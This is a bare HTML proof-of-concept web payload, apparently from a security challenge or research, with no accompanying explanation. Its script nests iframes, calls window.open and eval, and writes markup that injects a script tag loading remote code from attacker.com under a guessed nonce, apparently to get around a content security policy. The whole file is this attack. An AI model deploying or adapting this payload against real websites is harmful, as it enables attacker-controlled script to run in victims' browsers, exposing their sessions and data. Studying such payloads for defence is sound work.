<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGjRyFsGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGjRyFsGGGGG.onload=_=>GGGGGjRyFsGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGjRyFsGGG src=about:blank><\/iframe><script>GGGjRyFsGGG.onload=_=>GGGjRyFsGGG.contentDocument.body.innerHTML+=\x22<script src=https://attacker.com/static/static.js nonce=123><\\/script>\x22;GGGjRyFsGGG.contentWindow.location.reload();<\/script>');");GGGGGjRyFsGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>